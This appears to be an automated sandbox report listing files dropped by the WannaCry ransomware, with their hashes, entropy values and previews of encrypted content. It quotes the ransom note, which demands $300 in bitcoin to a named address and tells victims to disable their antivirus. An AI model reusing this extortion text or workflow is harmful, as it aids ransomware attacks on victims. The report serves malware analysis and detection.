                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85323522885903
                                                  Encrypted:false
                                                  SSDEEP:24:bkaSl9IOCWYH0U4PpPf9X20ec6+MQTw0NVYBxlRtlVmoruD5Y58v:bk8L914d9jD6dQE0NGRt9uS5o
                                                  MD5:A680EAA9373DF6DF240A8455ABFEC54D
                                                  SHA1:9F4A489592D65A764A7E32598EE508FACAD0A76E
                                                  SHA-256:9C3614BC83AAEC44CBFCCC16E90DDFF65002D30259B6FA30404196D2DFD35D99
                                                  SHA-512:7D79E95C4EE8BAF966A6B095B1E4CC7EB94AADD69D26B92FE6B9B69B9E354563B8E51BC28C82FAD5E82427A882CDF50C45F3891824BB685A37B7C212FA9D8D19
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....v...`2...W.........e .tIK.hG.%...(.s...'#.1.|e{.].Y.I...r.Zr1%t.".s..y..l.#..F.@..^e<v.p..:.I.Z..,.P...Y.........?.3...U.>..7..X~U..,.j.-..r..H#.....k...H.j..I1..7...5K<t.I|."e.t.hn].@..(...H....C._;'Z{K.#.y.I.g..~[..}?<..,.h..:>.3p.P....T../.\............0..E....-.&...3QS.@...... a.... u.l*...d.-Uc.YM.B.]....9...........)..J...p...(...E..+y...P.....wb.C..Y..K..T.....*...|dx...;....[.FP.)."..,.ku=4y@:.JuKA.......n<...>.........G~u..G+jUin_..7..V|G.i;.....J.3x...CEl..Z~[.P.)..3a..{5./.UE{T....<...:..@...8yg.....v.5.{...N.c..d..>...wu.r.6.t..~..q.;.../9..2....S~.-..fVt..7...f.:V..1..)V.....$Q.4..)t..."..qb....H>..`.&'...3M.^..?.K..:.[.7.06H3...<z.9...c.Q......#...A..[#.u........Wy..d.....h....L.M.....xIH.p..54.Mq.HkN....m...#93...f..p.iM.3.....=k..}G.g.'..m..u..].P...4.Sb.n./\...........1....?x.f.........c..=.&T...l.q.-v..o.a.niv.Q..5j.D.B9..b.....E....tB...3zp$.9[x.....T4...,...".E.W.$.X.WR}t...@[9.ac.mJ.g{.0 ...+.A.YK.....)...A

                                                  C:\Users\user\Documents\GAOBCVIQIJ.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85323522885903
                                                  Encrypted:false
                                                  SSDEEP:24:bkaSl9IOCWYH0U4PpPf9X20ec6+MQTw0NVYBxlRtlVmoruD5Y58v:bk8L914d9jD6dQE0NGRt9uS5o
                                                  MD5:A680EAA9373DF6DF240A8455ABFEC54D
                                                  SHA1:9F4A489592D65A764A7E32598EE508FACAD0A76E
                                                  SHA-256:9C3614BC83AAEC44CBFCCC16E90DDFF65002D30259B6FA30404196D2DFD35D99
                                                  SHA-512:7D79E95C4EE8BAF966A6B095B1E4CC7EB94AADD69D26B92FE6B9B69B9E354563B8E51BC28C82FAD5E82427A882CDF50C45F3891824BB685A37B7C212FA9D8D19
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....v...`2...W.........e .tIK.hG.%...(.s...'#.1.|e{.].Y.I...r.Zr1%t.".s..y..l.#..F.@..^e<v.p..:.I.Z..,.P...Y.........?.3...U.>..7..X~U..,.j.-..r..H#.....k...H.j..I1..7...5K<t.I|."e.t.hn].@..(...H....C._;'Z{K.#.y.I.g..~[..}?<..,.h..:>.3p.P....T../.\............0..E....-.&...3QS.@...... a.... u.l*...d.-Uc.YM.B.]....9...........)..J...p...(...E..+y...P.....wb.C..Y..K..T.....*...|dx...;....[.FP.)."..,.ku=4y@:.JuKA.......n<...>.........G~u..G+jUin_..7..V|G.i;.....J.3x...CEl..Z~[.P.)..3a..{5./.UE{T....<...:..@...8yg.....v.5.{...N.c..d..>...wu.r.6.t..~..q.;.../9..2....S~.-..fVt..7...f.:V..1..)V.....$Q.4..)t..."..qb....H>..`.&'...3M.^..?.K..:.[.7.06H3...<z.9...c.Q......#...A..[#.u........Wy..d.....h....L.M.....xIH.p..54.Mq.HkN....m...#93...f..p.iM.3.....=k..}G.g.'..m..u..].P...4.Sb.n./\...........1....?x.f.........c..=.&T...l.q.-v..o.a.niv.Q..5j.D.B9..b.....E....tB...3zp$.9[x.....T4...,...".E.W.$.X.WR}t...@[9.ac.mJ.g{.0 ...+.A.YK.....)...A

                                                  C:\Users\user\Documents\GAOBCVIQIJ.pdf

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7944110964953595
                                                  Encrypted:false
                                                  SSDEEP:24:7JQ+xHUrqJTbn32RNj3TP2ePjLk76hO+ev0zWluaREH6:y+x0rMr32RNj3TP2ek78jeszqC6
                                                  MD5:C7889EBC3C299AAEDC9D3C499DFAE58B
                                                  SHA1:91C7664408DD612E9D9AD9446B83B78672F7AABB
                                                  SHA-256:43C75FA9377EAE391949D6F2BD488F96F29EEB17DC4245484CD2C203A4DEBE6B
                                                  SHA-512:825A8AC88421C69CC127868F45289D1D53CD2DA6886199651E778BE2D8F1ED5CB80EF9F2B2E3AD4953A3A1504BBD4ACB228AC5C91F55F5E7DFC4742EADE98DF3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....z..#.\...j..X.7.R}[...-..T.w.......%.....J..-;.]6X..+b.N.H..........r...N.=>KgI......M.p....H."};.T(..9..Sx*.v|.....z.iI....a..dd....W.G...".M...o...V..Mh...go..g....).?..}..7....$.'.n..h...n.O..l....@Y.Rz...n.. .W&.Pa.......n.....W....@J..eI..R.3G.XI..*.Q./..R.Bn...TF.fT...?(}...j1D.j.{.j;...Ex.Ct"tI..z....-M.?...>K.[......001n...Jp.j...6Eq.f..0.&...$.z..}......Q..z....o.;B..^.u.R.(.L.:bF/.t.BCGXK=e(.-.-!..........R.G.5...K..V..i.x.I~...^...ep.k.$7..#..A.s^...t.Y....s..*......DK.t.-7...lE..Q.x.Jh>;g....D%'.8....5...........E.jm.(..5a.>..]N&..p...=.*'....#-.H9k...}.`...,.jt-G...;..,..._..R.B.&..Q+..o....w......p.Eq.".y..+"...jg.....8J...O,.....W........WR.e(....8.g.. .lC.0.....{...N.',.b....u.a...l{....M.A.0..3.J.......T..D.h.......8x.XM.Qt.;p....$.....x.?.......b&..N.g.&...HC:k.h.Y.Q.J~...k..,.C.e8.!N.e...f.s.u9...g.<N[> .GFR'Z...G(5..6v%$.....#...&...sv)..2....;p...,i9..`......MM.7..ej..5......('I........c......=.Y.

                                                  C:\Users\user\Documents\GAOBCVIQIJ.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.850093537725532
                                                  Encrypted:false
                                                  SSDEEP:24:bkcLZ/3XCCmyaHLaUnbg0AcdFR/9cK9tKNHkSTdt7J2/4mmk93M:bkQfXFm1raUbgzcdX/5Xq92Mki
                                                  MD5:35D843B632403931DB518807D9873441
                                                  SHA1:E458DC1B10746CA6C89EEB44BB98071AF4632966
                                                  SHA-256:0BB14C59636362E3EB25AD214A61301E24048FFDCF71132FB52133E7498AC86C
                                                  SHA-512:3BF12655BAEF40808E3CE932E285C1E035E839FB71D8918ECEDB96EFAB427B0C95F5D3BC9979849B98810A1954CDFDD00AB0A6290CD9C894FC59934D45AECED6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......,.D4.J.D.q.y.ST7c...# .D.F..G.`.mCEz.u.O......@].u0..qI.x.T.,q....5.....:..N....8....p.2..o.....{...e..ukK..qsB..QM....&.wj20.[Q.oL....A.....cZg.|K...=...T......qW.Cv?.PC..<....L.l.3.J7iv.Qj....v@..n.........!...Y.......@...."..v.)u..Ht....G0..............d....NJt*..7.>..h.c.3l..s.b.}<...KC.c.rb.,..c.[~.....U../...fw....g.RQ&...d.=..........n_...Q.OFZr7..{9..!..U.0....=[..Ac'.y..?S..>...L..6.Wz.<..KB.0.c..|.z....Zq.%..U. PW.&!]..L......#..q"...pP4w.^.\...b.ko....X..CQ...^..P6..Ls..=.V..OK;...e.X..g.Y...%0I..^H..$U.WW....i:. ....*.........(;.go49....b..+ab..................AEY...Al.G.@...6./:.2Q49P..v...n.......U.Oe.{~b/........tZu....M.@...b.}.r.e.Q....Y.i!.Q.<...h..I..%..Z....e~5#0.O..iF,i.eh".t*P..E4$. <...i..|..>.u..v.K.N.tF..'......WP....)m.k.:Zs...Y..D....4.f}..[RhS..i.....2O.(s..1f..T...........?..J..8l..\M.v...q.+N.vQo...i.../J..\.x.....%7..DL....ZU.Ka....Y.2h.[.<M.....k+..-q&..}.Wv..}.^...^]..EK*..].....I..B.........q\ .....

                                                  C:\Users\user\Documents\GAOBCVIQIJ.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.850093537725532
                                                  Encrypted:false
                                                  SSDEEP:24:bkcLZ/3XCCmyaHLaUnbg0AcdFR/9cK9tKNHkSTdt7J2/4mmk93M:bkQfXFm1raUbgzcdX/5Xq92Mki
                                                  MD5:35D843B632403931DB518807D9873441
                                                  SHA1:E458DC1B10746CA6C89EEB44BB98071AF4632966
                                                  SHA-256:0BB14C59636362E3EB25AD214A61301E24048FFDCF71132FB52133E7498AC86C
                                                  SHA-512:3BF12655BAEF40808E3CE932E285C1E035E839FB71D8918ECEDB96EFAB427B0C95F5D3BC9979849B98810A1954CDFDD00AB0A6290CD9C894FC59934D45AECED6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......,.D4.J.D.q.y.ST7c...# .D.F..G.`.mCEz.u.O......@].u0..qI.x.T.,q....5.....:..N....8....p.2..o.....{...e..ukK..qsB..QM....&.wj20.[Q.oL....A.....cZg.|K...=...T......qW.Cv?.PC..<....L.l.3.J7iv.Qj....v@..n.........!...Y.......@...."..v.)u..Ht....G0..............d....NJt*..7.>..h.c.3l..s.b.}<...KC.c.rb.,..c.[~.....U../...fw....g.RQ&...d.=..........n_...Q.OFZr7..{9..!..U.0....=[..Ac'.y..?S..>...L..6.Wz.<..KB.0.c..|.z....Zq.%..U. PW.&!]..L......#..q"...pP4w.^.\...b.ko....X..CQ...^..P6..Ls..=.V..OK;...e.X..g.Y...%0I..^H..$U.WW....i:. ....*.........(;.go49....b..+ab..................AEY...Al.G.@...6./:.2Q49P..v...n.......U.Oe.{~b/........tZu....M.@...b.}.r.e.Q....Y.i!.Q.<...h..I..%..Z....e~5#0.O..iF,i.eh".t*P..E4$. <...i..|..>.u..v.K.N.tF..'......WP....)m.k.:Zs...Y..D....4.f}..[RhS..i.....2O.(s..1f..T...........?..J..8l..\M.v...q.+N.vQo...i.../J..\.x.....%7..DL....ZU.Ka....Y.2h.[.<M.....k+..-q&..}.Wv..}.^...^]..EK*..].....I..B.........q\ .....

                                                  C:\Users\user\Documents\GAOBCVIQIJ\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\Users\user\Documents\GAOBCVIQIJ\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\Users\user\Documents\GAOBCVIQIJ\BJZFPPWAPT.png

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80916666933428
                                                  Encrypted:false
                                                  SSDEEP:24:bHLAOC+rEuhVUQTC5+lboUzWSjTn2PBtfiz4rJLwuRQ6xJfyLMEQW:/YiEE+QOYlf32pt6zMlF7fyLL
                                                  MD5:5D0883E414799FDD01AE76AB7E3AA011
                                                  SHA1:ED13947D25F076C6E7C8E7C3204B9EFCB93D7BFF
                                                  SHA-256:5BF3B7F06951E6BD99B1224E6AA8B769F4C12F5E6DB6633513D2DE32546CFB2A
                                                  SHA-512:AAC1FB4F862E4862042E91024C65363B78A977A00D0D3E580F3D37B47F788C83E4A72FF64100574A86CF5ADCFC7E9A4EE17B3D9D64AC91B4FC40BBACE8BA25C7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:....:..=.....L..*...4.._.....^@.<f.6...2.z.;..K<g.....i.\1....G..~..H...@d5...y`...C`..B...,..YH...;.m....n...6g.Z^.......|..L.{..EI8d...*...@.[.*n.(...o..R....`....z....w..<.............A.G....._.>....Q...Y.Z.....BY....NM.f...o:w=..6..7<Y...,..W.4..?.?..&9.;=.._.8.D.Cv.o...=.P.l.*..U..x...W.zq...........h0.*.^Bi.........Yw.......E..!.r....S.8'....no.z..G...Y.F..1..<.h.dm.k..Inx.......N.on}3....H..#8....{..N..@._..A.d#.i.v,Th.n>..ox....z;Ry..4.......JeX.W#1.W.tQq..T.=)....G.....H<f@..M......).M...S.... EnC2....%1..D6..p........T-.=_......pK.X.....0.....-P.p.(...K..<!.O~L.(.rg#..].....Fb.1G.MDs_6..g?d....e.....O.Q.'4k.}.....8...w%!'...)..x....x......?../.....S....P....~.h.L{.w..)q..?..F.R%Lp.....ZZ.Pe..+..^.f.B..4..N..*.s.....C;R.@..XH....g...".......J'\......W.+.....B...;.+r.z..._.N.A...4pW..s.v..q.#.^.w...6}p......._;......4in.Mb.4!...[..i......5......S.M8.-cO....p.....R.K...-...8..:R.......Q3....a.y.-...uV..m..C.........q..f,..W.........K.

                                                  C:\Users\user\Documents\GAOBCVIQIJ\BJZFPPWAPT.png.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.841822084956088
                                                  Encrypted:false
                                                  SSDEEP:24:bkbT8tj5VNynue7l8lR9Z69mjJZVOpVQbPyBoUhYquPs0+cKfDK/VfwGWi1tD0B1:bkbT8Z5Vgnjl8L949wXVOpuPmbAdNxNs
                                                  MD5:5AC3AE0CF72C947AC8DD60D72A4DD827
                                                  SHA1:13ED5244A979D467FA15DA9E941CD434BB1AA77E
                                                  SHA-256:947F07A64510F12F0C814E5A5952A66D4730C468F168CA24C0702B632BDA58D7
                                                  SHA-512:004FC9003653E7F19999834316A0D8396B43F51E22AE196B66408A48B9502C9CE0FBF2A91F298324BF61A44794E45EFB557BADE91D52EA7D7D53E0808B7B0602
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....$.......y2o....S.9........E.r..g.0.f.....s.@......W..Mkip..../[..>....j0..e.[...Dx..)^x|..r..@...X..lw..}....<,.Q..sP.L.uf.{-g?:..E..m.WLk.v.gA.|...bn...;Kz..aQJK....E....g.XtX.y.(@..G..*....l..@.38hx...il =u...2t.NK.kl..i.[l.q...OOp...,.".l.............i.x..9n.-.zj%C........D&.P.........\....=<...C...3.....c.I.....p.O.Yd.s...V.].U......a.(..~..R|..L.8..o....]..M[Ed..y...gy.i....g..b...yo|..z%....d.....,.#.....M...A.[4......(.........V..L..M..x"..`f...K....gV........@.....i..;h.-.x9K..O7..4s....U..Ory......C...'..4..F...?Zg.$.e..CO.w...A0...ud.. .w..|..J.q....%..Y=.._............LC#9K...~n..."...$../... .x..seK..%.,...a.Vv....t..i2.x....F...6..0....".3uTV..d|.^^.h}..rZIUf.....&.....y..".:..|V..[.f./$Ja.N..,..S...&..p.?....)`.17...*h.n..g:.j..s,...0..'s..d.....}.@....0 ..|...Db}.5......:..N3.$V.......]...a.....d.......S.b.DA...*:.<...(.+....".....S...{7..{....7@......c.[./..R....."...Fd..d....D../..c.m.t...7....,.....

                                                  C:\Users\user\Documents\GAOBCVIQIJ\BJZFPPWAPT.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.841822084956088
                                                  Encrypted:false
                                                  SSDEEP:24:bkbT8tj5VNynue7l8lR9Z69mjJZVOpVQbPyBoUhYquPs0+cKfDK/VfwGWi1tD0B1:bkbT8Z5Vgnjl8L949wXVOpuPmbAdNxNs
                                                  MD5:5AC3AE0CF72C947AC8DD60D72A4DD827
                                                  SHA1:13ED5244A979D467FA15DA9E941CD434BB1AA77E
                                                  SHA-256:947F07A64510F12F0C814E5A5952A66D4730C468F168CA24C0702B632BDA58D7
                                                  SHA-512:004FC9003653E7F19999834316A0D8396B43F51E22AE196B66408A48B9502C9CE0FBF2A91F298324BF61A44794E45EFB557BADE91D52EA7D7D53E0808B7B0602
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....$.......y2o....S.9........E.r..g.0.f.....s.@......W..Mkip..../[..>....j0..e.[...Dx..)^x|..r..@...X..lw..}....<,.Q..sP.L.uf.{-g?:..E..m.WLk.v.gA.|...bn...;Kz..aQJK....E....g.XtX.y.(@..G..*....l..@.38hx...il =u...2t.NK.kl..i.[l.q...OOp...,.".l.............i.x..9n.-.zj%C........D&.P.........\....=<...C...3.....c.I.....p.O.Yd.s...V.].U......a.(..~..R|..L.8..o....]..M[Ed..y...gy.i....g..b...yo|..z%....d.....,.#.....M...A.[4......(.........V..L..M..x"..`f...K....gV........@.....i..;h.-.x9K..O7..4s....U..Ory......C...'..4..F...?Zg.$.e..CO.w...A0...ud.. .w..|..J.q....%..Y=.._............LC#9K...~n..."...$../... .x..seK..%.,...a.Vv....t..i2.x....F...6..0....".3uTV..d|.^^.h}..rZIUf.....&.....y..".:..|V..[.f./$Ja.N..,..S...&..p.?....)`.17...*h.n..g:.j..s,...0..'s..d.....}.@....0 ..|...Db}.5......:..N3.$V.......]...a.....d.......S.b.DA...*:.<...(.+....".....S...{7..{....7@......c.[./..R....."...Fd..d....D../..c.m.t...7....,.....

                                                  C:\Users\user\Documents\GAOBCVIQIJ\BNAGMGSPLO.pdf

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.799115671762158
                                                  Encrypted:false
                                                  SSDEEP:24:8Lb888eS3BlYjHAjitpi+aBxGmsdY0uhMdf529:8LA8Mot7mPRXzqf56
                                                  MD5:24713DB2386E3442F858334B82AEF8E1
                                                  SHA1:1ACEF0FBC96CEB70D2E8C0128AEC4F22B41DB9B9
                                                  SHA-256:A1C82418F3CF9DD0FBC657645E28BF5F35B060DAEE7A0BFAEABCAB41DD61F211
                                                  SHA-512:C2AFE9C5417FBD01329E0F73CD8A485BFA384AE7F5EBF28C194413099B5F647259B991622D41B4C8D2E6BDE8BF17DB7EDFBD8DB916ADE357D5F6007F3FCCD169
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:G.4.....'.k....j'Q.....h..x.~b4..(.K=.0.[.o.@:Lx..8(...3.LiI...;..1(....zIWm.....9.g........4.H...yE.6l.Z...:.u.RGl....W.J...<....n.{...t+j...g..H2.r.t..D=fMM7.O.Ee ..,..9...-..e....vT..>`..P.Bf..$qQ...z..7G.......6..q...zu....T]..Om$...c...X...~.#..J.*.4...Z.....l2..vYF..a..Q.....x...D.l.....<.9.....:...B(.$k..J...D....;....pu1z..G3..<....R-9.]nu....1.C..!..o..M..B.....?_..|.J......i(0.N.._....U...cI........$h...c.HB.c.....x..m.....L..kk.;../e.;.....W.....I{.T*D(..o.......L....Ie..Bt.h..c....2.r.U:.0n.@v.Y.~.B-.cX'.....w....u...X........xs..V.J+K7..Z...y>.%..Vg.H....!]....J/.&....=..h.L...5.....cf'.\........T.1.U(....T~.&....,.<.$...`...(.4..+.}.)...u.g.u.|....W.n..3...b...hk.f..~...,{.u..MJ....Yb*.D.t...,.&#.x..#.g/p....s............0...f.......d.5,...'.<.@.uA_..8..}.'...n...:...d#.i.....]y.Ol..?..`].....c...iCG...z..W...<....g..@%..'v.... .}...:}..@...J.U1jQf..Qy..v..>.5|)...$.....h....Pn.u`...Fk...t.7..Kn-........p.W.........7$H.Y=..

                                                  C:\Users\user\Documents\GAOBCVIQIJ\BNAGMGSPLO.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.844759133706299
                                                  Encrypted:false
                                                  SSDEEP:24:bkmzeh1lMLPdJrL9XAt3GKNq48cJvVM9Mv+XbOvsOzVF:bkLh1lMrPv9X3KB8cJtM9MvsIsOT
                                                  MD5:178AAAFE48E45AE777FE3651BB941569
                                                  SHA1:2BF96C029D9C2DB50E54ABE7EDF5B288F99EFC6D
                                                  SHA-256:24707E9127F4C33B198B9E58A6159293403ED94F94A295BA44EEC754A7AC75AD
                                                  SHA-512:17AEEB1953368A3FE849C0B58D31367C309C20C2C2A3A12EF33BB81A16CA8A26897A45A7F0F85D3E7F27A0181651B64F0C103C6A417FC666949CDD34F7D6761F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....k./R.@v..2X../z..b.8...A......3..'.:.Dy.`....M._..L.j....x.-..a.z.+..u.`..j9..~X..Y.w..ln......o.0..3....W&.hN...yI.d#P..T.......t..St\Fy..Z..q.*[.*.8.......D..-c#...x.vP-ct&'....[.#....m...;........#.."....@..B........rS...`._".I...u.7..F.j............Z..KL..wyk..]7....L.q..w.6p......S]`...>.......c..oi-...L..B...*uT.@.\...xAL.=UO...sXK>G..b...+..B...g......`m...]...G..).Iy.G.y....3\.......nq1..XU^B`v....f.!..E...Eh....T%.o.g.t.c|...m.&....k>.".....Ab.04...dO..i-..yI.Z_./=..t#.......W....f............c.'/Hs..Y*....k.x.X.sG..~.V.*Sl%K...B...%D..n..O.lUN.E..;v....cH.%.|.Bc....Y.\m.....84&O............z.f.p'P......%..0k.s...}Lg.....\P.]....mT.s'..X{.+3m..lm..h7.H..1.....tF~...X)]&..z....B..(..f.BD.y5..Z:.c.K...m......Xg.l|...}>'.F..oZm.tU..y.........."..=$u:.v&.In......X...E].~.5..Ln9..)t.K..M.....C..k.:...R..999.......w..#..../*..3.......P..T.....J...~|..>......*k:..l,~....../Z.A..k.R....uc....j4.O.....KV...3:..Jp...m....O.p....-..

                                                  C:\Users\user\Documents\GAOBCVIQIJ\BNAGMGSPLO.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.844759133706299
                                                  Encrypted:false
                                                  SSDEEP:24:bkmzeh1lMLPdJrL9XAt3GKNq48cJvVM9Mv+XbOvsOzVF:bkLh1lMrPv9X3KB8cJtM9MvsIsOT
                                                  MD5:178AAAFE48E45AE777FE3651BB941569
                                                  SHA1:2BF96C029D9C2DB50E54ABE7EDF5B288F99EFC6D
                                                  SHA-256:24707E9127F4C33B198B9E58A6159293403ED94F94A295BA44EEC754A7AC75AD
                                                  SHA-512:17AEEB1953368A3FE849C0B58D31367C309C20C2C2A3A12EF33BB81A16CA8A26897A45A7F0F85D3E7F27A0181651B64F0C103C6A417FC666949CDD34F7D6761F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....k./R.@v..2X../z..b.8...A......3..'.:.Dy.`....M._..L.j....x.-..a.z.+..u.`..j9..~X..Y.w..ln......o.0..3....W&.hN...yI.d#P..T.......t..St\Fy..Z..q.*[.*.8.......D..-c#...x.vP-ct&'....[.#....m...;........#.."....@..B........rS...`._".I...u.7..F.j............Z..KL..wyk..]7....L.q..w.6p......S]`...>.......c..oi-...L..B...*uT.@.\...xAL.=UO...sXK>G..b...+..B...g......`m...]...G..).Iy.G.y....3\.......nq1..XU^B`v....f.!..E...Eh....T%.o.g.t.c|...m.&....k>.".....Ab.04...dO..i-..yI.Z_./=..t#.......W....f............c.'/Hs..Y*....k.x.X.sG..~.V.*Sl%K...B...%D..n..O.lUN.E..;v....cH.%.|.Bc....Y.\m.....84&O............z.f.p'P......%..0k.s...}Lg.....\P.]....mT.s'..X{.+3m..lm..h7.H..1.....tF~...X)]&..z....B..(..f.BD.y5..Z:.c.K...m......Xg.l|...}>'.F..oZm.tU..y.........."..=$u:.v&.In......X...E].~.5..Ln9..)t.K..M.....C..k.:...R..999.......w..#..../*..3.......P..T.....J...~|..>......*k:..l,~....../Z.A..k.R....uc....j4.O.....KV...3:..Jp...m....O.p....-..

                                                  C:\Users\user\Documents\GAOBCVIQIJ\EOWRVPQCCS.mp3

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.791364155426318
                                                  Encrypted:false
                                                  SSDEEP:24:kvH1luMGxrwSp2hYTVHuh4S38FDgjmpb0+mJFC5LskgFfrGPtO9:SuMGhhrT9uhr8FDgjib0tLieFClO9
                                                  MD5:C6C9793C9BD4121C420F5224B8C4C994
                                                  SHA1:5BFF65B6E212C788A79DF86F1D2426C44DB05783
                                                  SHA-256:CD32450E810D600F063AB39072861C6A9A08CA42B845E2CB0264BDA6D11EDB8E
                                                  SHA-512:CE5A64F848BB13C99C908DC271E6EFD012387E504E7290BFB57B122F29FCA21C24053E037B82A7F834EBD4DEBB948DA9B80DB5B56F9BCEEBFF976AD44ACDF320
                                                  Malicious:false
                                                  Reputation:unknown
